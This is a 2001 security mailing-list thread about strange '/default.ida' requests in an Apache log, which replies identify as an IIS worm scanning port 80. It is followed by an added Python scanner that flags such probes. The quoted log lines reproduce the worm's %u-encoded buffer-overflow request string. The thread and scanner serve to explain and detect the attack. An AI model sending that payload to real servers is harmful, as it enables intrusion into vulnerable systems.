Mailinglist Archive: opensuse-security (343 mails)

RE: [suse-security] Strange HTTP requests
  • From: <dog@xxxxxxxxx>
  • Date: Fri, 20 Jul 2001 08:05:10 -0500 (CDT)
  • Message-id: <Pine.LNX.4.31.0107200804140.15869-100000@xxxxxxxxxxxxx>
It's a worm that generates random IPs and does a scan of port 80 on the IP,
then tries to infect it if it finds a web server. The worm doesn't check to
see what version the web server is.

On Fri, 20 Jul 2001, Lars Schlimpert wrote:

>I have these default.ida requests too!
>But we are running Apache and Roxen servers only.
>What kind of stupid guys try this IIS exploit on Apache or Roxen? *rofl*
>
>tia, lars s.
>
>> -----Original Message-----
>> From: dog@xxxxxxxxx [mailto:dog@xxxxxxxxx]
>> Sent: Friday, July 20, 2001 6:08 AM
>> To: michael.ryan@xxxxxxxx
>> Cc: suse-security@xxxxxxxx
>> Subject: Re: [suse-security] Strange HTTP requests
>>
>>
>> This only affects Microsoft Internet Information Server (IIS). You have
>> nothing to worry about if you are only running Apache.
>>
>> On Thu, 19 Jul 2001 michael.ryan@xxxxxxxx wrote:
>>
>> >
>> >
>> >... on the same thread ... are there any known exploits/vulnerabilities for
>> >Apache 1.3.12 running on SuSE?
>> >(The only issue I found on
>> >http://www.suse.com/us/support/security/index.html was dated 07-09-2000 and
>> >just required a minor edit to httpd.conf)
>> >Should I upgrade to 1.3.19 anyway?
>> >
>> >TIA
>> >Michael
>> >
>> >
>> >
>> >
>> > Lars Trebing <ltrebing@ltrebing.de>
>> > To: SuSE Security Mailing List <suse-security@xxxxxxxx>
>> > cc:
>> > Subject: [suse-security] Strange HTTP requests
>> > 07/19/2001 07:46 PM
>> >
>> >
>> >
>> >
>> >
>> >
>> >Hello everyone,
>> >
>> >My Apache has just got three strange requests from three different
>> >addresses:
>> >
>> >63.149.209.133 - - [19/Jul/2001:18:55:47 +0200] "GET
>> >/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
>NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%
>> u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%
>> u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
>> >
>> >HTTP/1.0" 400 315
>> >209.215.117.8 - - [19/Jul/2001:19:14:28 +0200] "GET
>> >/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
>NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%
>> u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%
>> u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
>> >
>> >HTTP/1.0" 400 315
>> >161.184.88.254 - - [19/Jul/2001:19:21:18 +0200] "GET
>> >/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
>NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%
>> u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%
>> u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
>> >
>> >HTTP/1.0" 400 315
>> >
>> >Might this perhaps be an attack for a known bug of some HTTP server?
>> >Should I maybe even worry about this? (I am running Apache 1.3.12).
>> >
>> >By the way, I performed the same request locally and got a 404 error
>> >instead of the 400s reported in the log.
>> >
>> >TIA, Lars
>> >
>> >--
>> >To unsubscribe, e-mail: suse-security-unsubscribe@xxxxxxxx
>> >For additional commands, e-mail: suse-security-help@xxxxxxxx
>>
>> Chad Whitten
>> Network/Systems Administrator
>> Nexband Communications
>> chadwick@xxxxxxxxxxx

Chad Whitten
Network/Systems Administrator
Nexband Communications
chadwick@xxxxxxxxxxx
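
A defender's view of the requests quoted in this thread, as an added example that is not part of the original mails: a small Python scanner that picks `/default.ida` probes out of an Apache common-format access log and groups them by source address with the status the server returned. The function names, the regex thresholds and the sample log lines (documentation addresses, shortened filler) are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Apache common log format: host ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>.*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)
# Heuristics taken from the requests quoted in the thread: a GET for
# /default.ida, a long run of one filler character, then %uXXXX sequences.
IDA_RE = re.compile(r'^GET\s+/default\.ida\?(?P<query>\S*)', re.IGNORECASE)
FILLER_RE = re.compile(r'(.)\1{63,}')              # 64+ repeats (assumed threshold)
UENC_RE = re.compile(r'(?:%u[0-9a-fA-F]{4}){4,}')  # 4+ consecutive %u words (assumed)

def classify(line):
    """Return (host, status, reasons) for a default.ida probe, else None."""
    m = LOG_RE.match(line.strip())
    req = m and IDA_RE.match(m['request'])
    if not req:
        return None
    reasons = ['default.ida']
    if FILLER_RE.search(req['query']):
        reasons.append('long-filler')
    if UENC_RE.search(req['query']):
        reasons.append('%u-encoding')
    return m['host'], int(m['status']), reasons

def summarize(lines):
    """Group probes by source host -> list of (status, reasons)."""
    hits = defaultdict(list)
    for line in lines:
        r = classify(line)
        if r:
            hits[r[0]].append((r[1], r[2]))
    return dict(hits)

# Constructed sample input: documentation addresses, shortened query string.
PROBE = '/default.ida?' + 'N' * 200 + '%u9090%u6858%ucbd3%u7801%u9090=a'
SAMPLE = [
    f'192.0.2.10 - - [19/Jul/2001:18:55:47 +0200] "GET {PROBE} HTTP/1.0" 400 315',
    f'198.51.100.7 - - [19/Jul/2001:19:14:28 +0200] "GET {PROBE} HTTP/1.0" 404 280',
    '203.0.113.5 - - [19/Jul/2001:19:20:00 +0200] "GET /index.html HTTP/1.0" 200 1024',
    '192.0.2.10 - - [19/Jul/2001:19:30:00 +0200] "GET /default.ida?x=1 HTTP/1.0" 404 280',
]

if __name__ == '__main__':
    for host, events in summarize(SAMPLE).items():
        print(host, events)
```

A 4xx status next to a flagged request, as in the log excerpt quoted above, means the server rejected it; the per-host grouping is what feeds a blocklist or an abuse report.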

